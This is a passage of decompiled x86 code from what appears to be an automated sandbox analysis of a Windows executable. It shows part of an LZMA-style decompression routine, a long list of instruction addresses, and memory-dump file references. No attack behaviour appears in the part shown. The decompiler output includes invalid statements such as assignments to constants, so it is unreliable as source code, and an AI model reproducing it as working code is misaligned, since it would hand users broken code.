                                      												goto L149;
                                      											}
                                      										case 0x18:
                                      											goto L146;
                                      										case 0x19:
                                      											L94:
                                      											__eflags = __ebx - 4;
                                      											if(__ebx < 4) {
                                      												L98:
                                      												 *(__ebp - 0x2c) = __ebx;
                                      												L119:
                                      												_t393 = __ebp - 0x2c;
                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                      												__eflags =  *_t393;
                                      												L120:
                                      												__eax =  *(__ebp - 0x2c);
                                      												__eflags = __eax;
                                      												if(__eax == 0) {
                                      													L166:
                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                      													goto L170;
                                      												}
                                      												L121:
                                      												__eflags = __eax -  *(__ebp - 0x60);
                                      												if(__eax >  *(__ebp - 0x60)) {
                                      													goto L171;
                                      												}
                                      												L122:
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                      												__eax =  *(__ebp - 0x30);
                                      												_t400 = __ebp - 0x60;
                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                      												__eflags =  *_t400;
                                      												goto L123;
                                      											}
                                      											L95:
                                      											__ecx = __ebx;
                                      											__eax = __ebx;
                                      											__ecx = __ebx >> 1;
                                      											__eax = __ebx & 0x00000001;
                                      											__ecx = (__ebx >> 1) - 1;
                                      											__al = __al | 0x00000002;
                                      											__eax = (__ebx & 0x00000001) << __cl;
                                      											__eflags = __ebx - 0xe;
                                      											 *(__ebp - 0x2c) = __eax;
                                      											if(__ebx >= 0xe) {
                                      												L97:
                                      												__ebx = 0;
                                      												 *(__ebp - 0x48) = __ecx;
                                      												L102:
                                      												__eflags =  *(__ebp - 0x48);
                                      												if( *(__ebp - 0x48) <= 0) {
                                      													L107:
                                      													__eax = __eax + __ebx;
                                      													 *(__ebp - 0x40) = 4;
                                      													 *(__ebp - 0x2c) = __eax;
                                      													__eax =  *(__ebp - 4);
                                      													__eax =  *(__ebp - 4) + 0x644;
                                      													__eflags = __eax;
                                      													L108:
                                      													__ebx = 0;
                                      													 *(__ebp - 0x58) = __eax;
                                      													 *(__ebp - 0x50) = 1;
                                      													 *(__ebp - 0x44) = 0;
                                      													 *(__ebp - 0x48) = 0;
                                      													L112:
                                      													__eax =  *(__ebp - 0x40);
                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                      														L118:
                                      														_t391 = __ebp - 0x2c;
                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                      														__eflags =  *_t391;
                                      														goto L119;
                                      													}
                                      													L113:
                                      													__eax =  *(__ebp - 0x50);
                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                      													__eax =  *(__ebp - 0x58);
                                      													__esi = __edi + __eax;
                                      													 *(__ebp - 0x54) = __esi;
                                      													__ax =  *__esi;
                                      													__ecx = __ax & 0x0000ffff;
                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                      													if( *(__ebp - 0xc) >= __edx) {
                                      														__ecx = 0;
                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                      														__ecx = 1;
                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                      														__ebx = 1;
                                      														__ecx =  *(__ebp - 0x48);
                                      														__ebx = 1 << __cl;
                                      														__ecx = 1 << __cl;
                                      														__ebx =  *(__ebp - 0x44);
                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                      														__cx = __ax;
                                      														__cx = __ax >> 5;
                                      														__eax = __eax - __ecx;
                                      														__edi = __edi + 1;
                                      														__eflags = __edi;
                                      														 *(__ebp - 0x44) = __ebx;
                                      														 *__esi = __ax;
                                      														 *(__ebp - 0x50) = __edi;
                                      													} else {
                                      														 *(__ebp - 0x10) = __edx;
                                      														0x800 = 0x800 - __ecx;
                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                      														 *__esi = __dx;
                                      													}
                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                      														L111:
                                      														_t368 = __ebp - 0x48;
                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                      														__eflags =  *_t368;
                                      														goto L112;
                                      													} else {
                                      														L117:
                                      														goto L109;
                                      													}
                                      												}
                                      												L103:
                                      												__ecx =  *(__ebp - 0xc);
                                      												__ebx = __ebx + __ebx;
                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      												 *(__ebp - 0x44) = __ebx;
                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                      													__ecx =  *(__ebp - 0x10);
                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                      													__ebx = __ebx | 0x00000001;
                                      													__eflags = __ebx;
                                      													 *(__ebp - 0x44) = __ebx;
                                      												}
                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                      													L101:
                                      													_t338 = __ebp - 0x48;
                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                      													__eflags =  *_t338;
                                      													goto L102;
                                      												} else {
                                      													L106:
                                      													goto L99;
                                      												}
                                      											}
                                      											L96:
                                      											__edx =  *(__ebp - 4);
                                      											__eax = __eax - __ebx;
                                      											 *(__ebp - 0x40) = __ecx;
                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                      											goto L108;
                                      										case 0x1a:
                                      											L56:
                                      											__eflags =  *(__ebp - 0x64);
                                      											if( *(__ebp - 0x64) == 0) {
                                      												L162:
                                      												 *(__ebp - 0x88) = 0x1a;
                                      												goto L170;
                                      											}
                                      											L57:
                                      											__ecx =  *(__ebp - 0x68);
                                      											__al =  *(__ebp - 0x5c);
                                      											__edx =  *(__ebp - 8);
                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      											 *( *(__ebp - 0x68)) = __al;
                                      											__ecx =  *(__ebp - 0x14);
                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                      											__eax = __ecx + 1;
                                      											__edx = 0;
                                      											_t192 = __eax %  *(__ebp - 0x74);
                                      											__eax = __eax /  *(__ebp - 0x74);
                                      											__edx = _t192;
                                      											goto L80;
                                      										case 0x1b:
                                      											L76:
                                      											__eflags =  *(__ebp - 0x64);
                                      											if( *(__ebp - 0x64) == 0) {
                                      												L163:
                                      												 *(__ebp - 0x88) = 0x1b;
                                      												goto L170;
                                      											}
                                      											L77:
                                      											__eax =  *(__ebp - 0x14);
                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      											__eflags = __eax -  *(__ebp - 0x74);
                                      											if(__eax >=  *(__ebp - 0x74)) {
                                      												__eax = __eax +  *(__ebp - 0x74);
                                      												__eflags = __eax;
                                      											}
                                      											__edx =  *(__ebp - 8);
                                      											__cl =  *(__eax + __edx);
                                      											__eax =  *(__ebp - 0x14);
                                      											 *(__ebp - 0x5c) = __cl;
                                      											 *(__eax + __edx) = __cl;
                                      											__eax = __eax + 1;
                                      											__edx = 0;
                                      											_t275 = __eax %  *(__ebp - 0x74);
                                      											__eax = __eax /  *(__ebp - 0x74);
                                      											__edx = _t275;
                                      											__eax =  *(__ebp - 0x68);
                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      											_t284 = __ebp - 0x64;
                                      											 *_t284 =  *(__ebp - 0x64) - 1;
                                      											__eflags =  *_t284;
                                      											 *( *(__ebp - 0x68)) = __cl;
                                      											L80:
                                      											 *(__ebp - 0x14) = __edx;
                                      											goto L81;
                                      										case 0x1c:
                                      											while(1) {
                                      												L123:
                                      												__eflags =  *(__ebp - 0x64);
                                      												if( *(__ebp - 0x64) == 0) {
                                      													break;
                                      												}
                                      												L124:
                                      												__eax =  *(__ebp - 0x14);
                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      												__eflags = __eax -  *(__ebp - 0x74);
                                      												if(__eax >=  *(__ebp - 0x74)) {
                                      													__eax = __eax +  *(__ebp - 0x74);
                                      													__eflags = __eax;
                                      												}
                                      												__edx =  *(__ebp - 8);
                                      												__cl =  *(__eax + __edx);
                                      												__eax =  *(__ebp - 0x14);
                                      												 *(__ebp - 0x5c) = __cl;
                                      												 *(__eax + __edx) = __cl;
                                      												__eax = __eax + 1;
                                      												__edx = 0;
                                      												_t414 = __eax %  *(__ebp - 0x74);
                                      												__eax = __eax /  *(__ebp - 0x74);
                                      												__edx = _t414;
                                      												__eax =  *(__ebp - 0x68);
                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                      												__eflags =  *(__ebp - 0x30);
                                      												 *( *(__ebp - 0x68)) = __cl;
                                      												 *(__ebp - 0x14) = _t414;
                                      												if( *(__ebp - 0x30) > 0) {
                                      													continue;
                                      												} else {
                                      													L127:
                                      													L81:
                                      													 *(__ebp - 0x88) = 2;
                                      													goto L1;
                                      												}
                                      											}
                                      											L167:
                                      											 *(__ebp - 0x88) = 0x1c;
                                      											goto L170;
                                      									}
                                      								}
                                      								L171:
                                      								_t539 = _t538 | 0xffffffff;
                                      								goto L172;
                                      							}
                                      						}
                                      					}
                                      				}
                                      			}















                                      0x00407194
                                      0x00407194
                                      0x00407194
                                      0x00407194
                                      0x0040719a
                                      0x0040719e
                                      0x004071a2
                                      0x004071ac
                                      0x004071ba
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x004074c7
                                      0x004074c7
                                      0x004074cb
                                      0x00000000
                                      0x00000000
                                      0x004074cd
                                      0x004074d6
                                      0x004074dc
                                      0x004074df
                                      0x004074e2
                                      0x004074e5
                                      0x004074e8
                                      0x004074ee
                                      0x00407507
                                      0x0040750a
                                      0x00407516
                                      0x00407517
                                      0x0040751a
                                      0x004074f0
                                      0x004074f0
                                      0x004074ff
                                      0x00407502
                                      0x00407502
                                      0x00407524
                                      0x004074c4
                                      0x004074c4
                                      0x004074c4
                                      0x004074c7
                                      0x004074cb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407526
                                      0x00407526
                                      0x0040749f
                                      0x004074a3
                                      0x004075db
                                      0x004075db
                                      0x004075e5
                                      0x004075ed
                                      0x004075f4
                                      0x004075f6
                                      0x004075fd
                                      0x00407601
                                      0x00407601
                                      0x004074a9
                                      0x004074af
                                      0x004074b6
                                      0x004074be
                                      0x004074be
                                      0x004074c1
                                      0x00000000
                                      0x004074c1
                                      0x0040752b
                                      0x00407538
                                      0x0040753b
                                      0x00407447
                                      0x00407447
                                      0x00407447
                                      0x00406be3
                                      0x00406be3
                                      0x00406be3
                                      0x00406bec
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x00406bf2
                                      0x00000000
                                      0x00406bf9
                                      0x00406bfd
                                      0x00000000
                                      0x00000000
                                      0x00406c03
                                      0x00406c06
                                      0x00406c09
                                      0x00406c0c
                                      0x00406c10
                                      0x00000000
                                      0x00000000
                                      0x00406c16
                                      0x00406c16
                                      0x00406c19
                                      0x00406c1b
                                      0x00406c1c
                                      0x00406c1f
                                      0x00406c21
                                      0x00406c22
                                      0x00406c24
                                      0x00406c27
                                      0x00406c2c
                                      0x00406c31
                                      0x00406c3a
                                      0x00406c4d
                                      0x00406c50
                                      0x00406c5c
                                      0x00406c84
                                      0x00406c86
                                      0x00406c94
                                      0x00406c94
                                      0x00406c98
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406c88
                                      0x00406c88
                                      0x00406c8b
                                      0x00406c8c
                                      0x00406c8c
                                      0x00000000
                                      0x00406c88
                                      0x00406c5e
                                      0x00406c62
                                      0x00406c67
                                      0x00406c67
                                      0x00406c70
                                      0x00406c78
                                      0x00406c7b
                                      0x00000000
                                      0x00406c81
                                      0x00406c81
                                      0x00000000
                                      0x00406c81
                                      0x00000000
                                      0x00406c9e
                                      0x00406c9e
                                      0x00406ca2
                                      0x0040754e
                                      0x0040754e
                                      0x00000000
                                      0x0040754e
                                      0x00406ca8
                                      0x00406cab
                                      0x00406cbb
                                      0x00406cbe
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc1
                                      0x00406cc4
                                      0x00406cc8
                                      0x00000000
                                      0x00000000
                                      0x00406cca
                                      0x00406cca
                                      0x00406cd0
                                      0x00406cfa
                                      0x00406d00
                                      0x00406d07
                                      0x00000000
                                      0x00406d07
                                      0x00406cd2
                                      0x00406cd6
                                      0x00406cd9
                                      0x00406cde
                                      0x00406cde
                                      0x00406ce9
                                      0x00406cf1
                                      0x00406cf4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406d39
                                      0x00406d3f
                                      0x00406d42
                                      0x00406d4f
                                      0x00406d57
                                      0x00000000
                                      0x00000000
                                      0x00406d0e
                                      0x00406d0e
                                      0x00406d12
                                      0x0040755d
                                      0x0040755d
                                      0x00000000
                                      0x0040755d
                                      0x00406d18
                                      0x00406d1e
                                      0x00406d29
                                      0x00406d29
                                      0x00406d29
                                      0x00406d2c
                                      0x00406d2f
                                      0x00406d32
                                      0x00406d37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004073ce
                                      0x004073ce
                                      0x004073d4
                                      0x004073da
                                      0x004073e0
                                      0x004073fa
                                      0x004073fd
                                      0x00407403
                                      0x0040740e
                                      0x0040740e
                                      0x00407410
                                      0x004073e2
                                      0x004073e2
                                      0x004073f1
                                      0x004073f5
                                      0x004073f5
                                      0x0040741a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040741c
                                      0x00407420
                                      0x004075cf
                                      0x004075cf
                                      0x00000000
                                      0x004075cf
                                      0x00407426
                                      0x0040742c
                                      0x00407433
                                      0x0040743b
                                      0x0040743e
                                      0x00407441
                                      0x00407441
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x00000000
                                      0x00406d5f
                                      0x00406d5f
                                      0x00406d61
                                      0x00406d64
                                      0x00406dd5
                                      0x00406dd5
                                      0x00406dd8
                                      0x00406ddb
                                      0x00406de2
                                      0x00406dec
                                      0x00000000
                                      0x00406dec
                                      0x00406d66
                                      0x00406d66
                                      0x00406d6a
                                      0x00406d6d
                                      0x00406d6f
                                      0x00406d72
                                      0x00406d75
                                      0x00406d77
                                      0x00406d7a
                                      0x00406d7c
                                      0x00406d81
                                      0x00406d84
                                      0x00406d87
                                      0x00406d8b
                                      0x00406d92
                                      0x00406d95
                                      0x00406d9c
                                      0x00406da0
                                      0x00406da8
                                      0x00406da8
                                      0x00406da8
                                      0x00406da2
                                      0x00406da2
                                      0x00406da2
                                      0x00406d97
                                      0x00406d97
                                      0x00406d97
                                      0x00406dac
                                      0x00406daf
                                      0x00406dcd
                                      0x00406dcd
                                      0x00406dcf
                                      0x00000000
                                      0x00406db1
                                      0x00406db1
                                      0x00406db1
                                      0x00406db4
                                      0x00406db7
                                      0x00406dba
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbc
                                      0x00406dbf
                                      0x00406dc2
                                      0x00406dc4
                                      0x00406dc5
                                      0x00406dc8
                                      0x00000000
                                      0x00406dc8
                                      0x00000000
                                      0x00406ffe
                                      0x00406ffe
                                      0x00407002
                                      0x00407020
                                      0x00407020
                                      0x00407023
                                      0x0040702a
                                      0x0040702d
                                      0x00407030
                                      0x00407033
                                      0x00407036
                                      0x00407039
                                      0x0040703b
                                      0x00407042
                                      0x00407043
                                      0x00407045
                                      0x00407048
                                      0x0040704b
                                      0x0040704e
                                      0x0040704e
                                      0x00407053
                                      0x00000000
                                      0x00407053
                                      0x00407004
                                      0x00407004
                                      0x00407007
                                      0x0040700a
                                      0x00407014
                                      0x00000000
                                      0x00000000
                                      0x00407068
                                      0x00407068
                                      0x0040706c
                                      0x0040708f
                                      0x00407092
                                      0x00407095
                                      0x0040709f
                                      0x0040706e
                                      0x0040706e
                                      0x00407071
                                      0x00407074
                                      0x00407077
                                      0x00407084
                                      0x00407087
                                      0x00407087
                                      0x00000000
                                      0x00000000
                                      0x004070ab
                                      0x004070ab
                                      0x004070af
                                      0x00000000
                                      0x00000000
                                      0x004070b5
                                      0x004070b5
                                      0x004070b9
                                      0x00000000
                                      0x00000000
                                      0x004070bf
                                      0x004070bf
                                      0x004070c1
                                      0x004070c5
                                      0x004070c5
                                      0x004070c8
                                      0x004070cc
                                      0x00000000
                                      0x00000000
                                      0x0040711c
                                      0x0040711c
                                      0x00407120
                                      0x00407127
                                      0x00407127
                                      0x0040712a
                                      0x0040712d
                                      0x00407137
                                      0x00000000
                                      0x00407137
                                      0x00407122
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407143
                                      0x00407143
                                      0x00407147
                                      0x0040714e
                                      0x00407151
                                      0x00407154
                                      0x00407149
                                      0x00407149
                                      0x00407149
                                      0x00407157
                                      0x0040715a
                                      0x0040715d
                                      0x0040715d
                                      0x00407160
                                      0x00407163
                                      0x00407166
                                      0x00407166
                                      0x00407169
                                      0x00407170
                                      0x00407175
                                      0x00000000
                                      0x00000000
                                      0x00407203
                                      0x00407203
                                      0x00407207
                                      0x004075a5
                                      0x004075a5
                                      0x00000000
                                      0x004075a5
                                      0x0040720d
                                      0x0040720d
                                      0x00407210
                                      0x00407213
                                      0x00407217
                                      0x0040721a
                                      0x00407220
                                      0x00407222
                                      0x00407222
                                      0x00407222
                                      0x00407225
                                      0x00407228
                                      0x00000000
                                      0x00000000
                                      0x00406df8
                                      0x00406df8
                                      0x00406dfc
                                      0x00407569
                                      0x00407569
                                      0x00000000
                                      0x00407569
                                      0x00406e02
                                      0x00406e02
                                      0x00406e05
                                      0x00406e08
                                      0x00406e0c
                                      0x00406e0f
                                      0x00406e15
                                      0x00406e17
                                      0x00406e17
                                      0x00406e17
                                      0x00406e1a
                                      0x00406e1d
                                      0x00406e1d
                                      0x00406e20
                                      0x00406e23
                                      0x00000000
                                      0x00000000
                                      0x00406e29
                                      0x00406e29
                                      0x00406e2f
                                      0x00000000
                                      0x00000000
                                      0x00406e35
                                      0x00406e35
                                      0x00406e39
                                      0x00406e3c
                                      0x00406e3f
                                      0x00406e42
                                      0x00406e45
                                      0x00406e46
                                      0x00406e49
                                      0x00406e4b
                                      0x00406e51
                                      0x00406e54
                                      0x00406e57
                                      0x00406e5a
                                      0x00406e5d
                                      0x00406e60
                                      0x00406e63
                                      0x00406e7f
                                      0x00406e82
                                      0x00406e85
                                      0x00406e88
                                      0x00406e8f
                                      0x00406e93
                                      0x00406e95
                                      0x00406e99
                                      0x00406e65
                                      0x00406e65
                                      0x00406e69
                                      0x00406e71
                                      0x00406e76
                                      0x00406e78
                                      0x00406e7a
                                      0x00406e7a
                                      0x00406e9c
                                      0x00406ea3
                                      0x00406ea6
                                      0x00000000
                                      0x00406eac
                                      0x00406eac
                                      0x00000000
                                      0x00406eac
                                      0x00000000
                                      0x00406eb1
                                      0x00406eb1
                                      0x00406eb5
                                      0x00407575
                                      0x00407575
                                      0x00000000
                                      0x00407575
                                      0x00406ebb
                                      0x00406ebb
                                      0x00406ebe
                                      0x00406ec1
                                      0x00406ec5
                                      0x00406ec8
                                      0x00406ece
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed0
                                      0x00406ed3
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406ed6
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00406ede
                                      0x00406ede
                                      0x00406ee1
                                      0x00406ee4
                                      0x00406ee7
                                      0x00406eea
                                      0x00406eed
                                      0x00406ef0
                                      0x00406ef3
                                      0x00406ef6
                                      0x00406ef9
                                      0x00406efc
                                      0x00406f14
                                      0x00406f17
                                      0x00406f1a
                                      0x00406f1d
                                      0x00406f1d
                                      0x00406f20
                                      0x00406f24
                                      0x00406f26
                                      0x00406efe
                                      0x00406efe
                                      0x00406f06
                                      0x00406f0b
                                      0x00406f0d
                                      0x00406f0f
                                      0x00406f0f
                                      0x00406f29
                                      0x00406f30
                                      0x00406f33
                                      0x00000000
                                      0x00406f35
                                      0x00406f35
                                      0x00000000
                                      0x00406f35
                                      0x00406f33
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00406f3a
                                      0x00000000
                                      0x00000000
                                      0x00406f75
                                      0x00406f75
                                      0x00406f79
                                      0x00407581
                                      0x00407581
                                      0x00000000
                                      0x00407581
                                      0x00406f7f
                                      0x00406f7f
                                      0x00406f82
                                      0x00406f85
                                      0x00406f89
                                      0x00406f8c
                                      0x00406f92
                                      0x00406f94
                                      0x00406f94
                                      0x00406f94
                                      0x00406f97
                                      0x00406f9a
                                      0x00406f9a
                                      0x00406fa0
                                      0x00406f3e
                                      0x00406f3e
                                      0x00406f41
                                      0x00000000
                                      0x00406f41
                                      0x00406fa2
                                      0x00406fa2
                                      0x00406fa5
                                      0x00406fa8
                                      0x00406fab
                                      0x00406fae
                                      0x00406fb1
                                      0x00406fb4
                                      0x00406fb7
                                      0x00406fba
                                      0x00406fbd
                                      0x00406fc0
                                      0x00406fd8
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fe1
                                      0x00406fe1
                                      0x00406fe4
                                      0x00406fe8
                                      0x00406fea
                                      0x00406fc2
                                      0x00406fc2
                                      0x00406fca
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd3
                                      0x00406fd3
                                      0x00406fed
                                      0x00406ff4
                                      0x00406ff7
                                      0x00000000
                                      0x00406ff9
                                      0x00406ff9
                                      0x00000000
                                      0x00406ff9
                                      0x00000000
                                      0x00407286
                                      0x00407286
                                      0x0040728a
                                      0x004075b1
                                      0x004075b1
                                      0x00000000
                                      0x004075b1
                                      0x00407290
                                      0x00407290
                                      0x00407293
                                      0x00407296
                                      0x0040729a
                                      0x0040729d
                                      0x004072a3
                                      0x004072a5
                                      0x004072a5
                                      0x004072a5
                                      0x004072a8
                                      0x00000000
                                      0x00000000
                                      0x00407056
                                      0x00407056
                                      0x00407059
                                      0x00000000
                                      0x00000000
                                      0x00407395
                                      0x00407395
                                      0x00407399
                                      0x004073bb
                                      0x004073bb
                                      0x004073be
                                      0x004073c8
                                      0x004073cb
                                      0x004073cb
                                      0x00000000
                                      0x004073cb
                                      0x0040739b
                                      0x0040739b
                                      0x0040739e
                                      0x004073a2
                                      0x004073a5
                                      0x004073a5
                                      0x004073a8
                                      0x00000000
                                      0x00000000
                                      0x00407452
                                      0x00407452
                                      0x00407456
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x00407474
                                      0x0040747b
                                      0x00407482
                                      0x00407489
                                      0x00407489
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x0040749d
                                      0x00407458
                                      0x00407458
                                      0x0040745b
                                      0x0040745e
                                      0x00407461
                                      0x00407468
                                      0x004073ac
                                      0x004073ac
                                      0x004073af
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00407543
                                      0x00407546
                                      0x00407447
                                      0x00407447
                                      0x00407447
                                      0x00000000
                                      0x0040744d
                                      0x00000000
                                      0x0040717d
                                      0x0040717d
                                      0x0040717f
                                      0x00407186
                                      0x00407187
                                      0x00407189
                                      0x0040718c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407490
                                      0x00407490
                                      0x00407493
                                      0x0040749a
                                      0x00000000
                                      0x0040749d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004071c2
                                      0x004071c2
                                      0x004071c5
                                      0x004071fb
                                      0x004071fb
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732b
                                      0x0040732e
                                      0x0040732e
                                      0x00407331
                                      0x00407333
                                      0x004075bd
                                      0x004075bd
                                      0x00000000
                                      0x004075bd
                                      0x00407339
                                      0x00407339
                                      0x0040733c
                                      0x00000000
                                      0x00000000
                                      0x00407342
                                      0x00407342
                                      0x00407346
                                      0x00407349
                                      0x00407349
                                      0x00407349
                                      0x00000000
                                      0x00407349
                                      0x004071c7
                                      0x004071c7
                                      0x004071c9
                                      0x004071cb
                                      0x004071cd
                                      0x004071d0
                                      0x004071d1
                                      0x004071d3
                                      0x004071d5
                                      0x004071d8
                                      0x004071db
                                      0x004071f1
                                      0x004071f1
                                      0x004071f6
                                      0x0040722e
                                      0x0040722e
                                      0x00407232
                                      0x0040725b
                                      0x0040725e
                                      0x00407260
                                      0x00407267
                                      0x0040726a
                                      0x0040726d
                                      0x0040726d
                                      0x00407272
                                      0x00407272
                                      0x00407274
                                      0x00407277
                                      0x0040727e
                                      0x00407281
                                      0x004072ae
                                      0x004072ae
                                      0x004072b1
                                      0x004072b4
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00407328
                                      0x00000000
                                      0x00407328
                                      0x004072b6
                                      0x004072b6
                                      0x004072bc
                                      0x004072bf
                                      0x004072c2
                                      0x004072c5
                                      0x004072c8
                                      0x004072cb
                                      0x004072ce
                                      0x004072d1
                                      0x004072d4
                                      0x004072d7
                                      0x004072f0
                                      0x004072f2
                                      0x004072f5
                                      0x004072f6
                                      0x004072f9
                                      0x004072fb
                                      0x004072fe
                                      0x00407300
                                      0x00407302
                                      0x00407305
                                      0x00407307
                                      0x0040730a
                                      0x0040730e
                                      0x00407310
                                      0x00407310
                                      0x00407311
                                      0x00407314
                                      0x00407317
                                      0x004072d9
                                      0x004072d9
                                      0x004072e1
                                      0x004072e6
                                      0x004072e8
                                      0x004072eb
                                      0x004072eb
                                      0x0040731a
                                      0x00407321
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x004072ab
                                      0x00000000
                                      0x00407323
                                      0x00407323
                                      0x00000000
                                      0x00407323
                                      0x00407321
                                      0x00407234
                                      0x00407234
                                      0x00407237
                                      0x00407239
                                      0x0040723c
                                      0x0040723f
                                      0x00407242
                                      0x00407244
                                      0x00407247
                                      0x0040724a
                                      0x0040724a
                                      0x0040724d
                                      0x0040724d
                                      0x00407250
                                      0x00407257
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x0040722b
                                      0x00000000
                                      0x00407259
                                      0x00407259
                                      0x00000000
                                      0x00407259
                                      0x00407257
                                      0x004071dd
                                      0x004071dd
                                      0x004071e0
                                      0x004071e2
                                      0x004071e5
                                      0x00000000
                                      0x00000000
                                      0x00406f44
                                      0x00406f44
                                      0x00406f48
                                      0x0040758d
                                      0x0040758d
                                      0x00000000
                                      0x0040758d
                                      0x00406f4e
                                      0x00406f4e
                                      0x00406f51
                                      0x00406f54
                                      0x00406f57
                                      0x00406f5a
                                      0x00406f5d
                                      0x00406f60
                                      0x00406f62
                                      0x00406f65
                                      0x00406f68
                                      0x00406f6b
                                      0x00406f6d
                                      0x00406f6d
                                      0x00406f6d
                                      0x00000000
                                      0x00000000
                                      0x004070cf
                                      0x004070cf
                                      0x004070d3
                                      0x00407599
                                      0x00407599
                                      0x00000000
                                      0x00407599
                                      0x004070d9
                                      0x004070d9
                                      0x004070dc
                                      0x004070df
                                      0x004070e2
                                      0x004070e4
                                      0x004070e4
                                      0x004070e4
                                      0x004070e7
                                      0x004070ea
                                      0x004070ed
                                      0x004070f0
                                      0x004070f3
                                      0x004070f6
                                      0x004070f7
                                      0x004070f9
                                      0x004070f9
                                      0x004070f9
                                      0x004070fc
                                      0x004070ff
                                      0x00407102
                                      0x00407105
                                      0x00407105
                                      0x00407105
                                      0x00407108
                                      0x0040710a
                                      0x0040710a
                                      0x00000000
                                      0x00000000
                                      0x0040734c
                                      0x0040734c
                                      0x0040734c
                                      0x00407350
                                      0x00000000
                                      0x00000000
                                      0x00407356
                                      0x00407356
                                      0x00407359
                                      0x0040735c
                                      0x0040735f
                                      0x00407361
                                      0x00407361
                                      0x00407361
                                      0x00407364
                                      0x00407367
                                      0x0040736a
                                      0x0040736d
                                      0x00407370
                                      0x00407373
                                      0x00407374
                                      0x00407376
                                      0x00407376
                                      0x00407376
                                      0x00407379
                                      0x0040737c
                                      0x0040737f
                                      0x00407382
                                      0x00407385
                                      0x00407389
                                      0x0040738b
                                      0x0040738e
                                      0x00000000
                                      0x00407390
                                      0x00407390
                                      0x0040710d
                                      0x0040710d
                                      0x00000000
                                      0x0040710d
                                      0x0040738e
                                      0x004075c3
                                      0x004075c3
                                      0x00000000
                                      0x00000000
                                      0x00406bf2
                                      0x004075fa
                                      0x004075fa
                                      0x00000000
                                      0x004075fa
                                      0x00407447
                                      0x004074c7
                                      0x00407490

                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
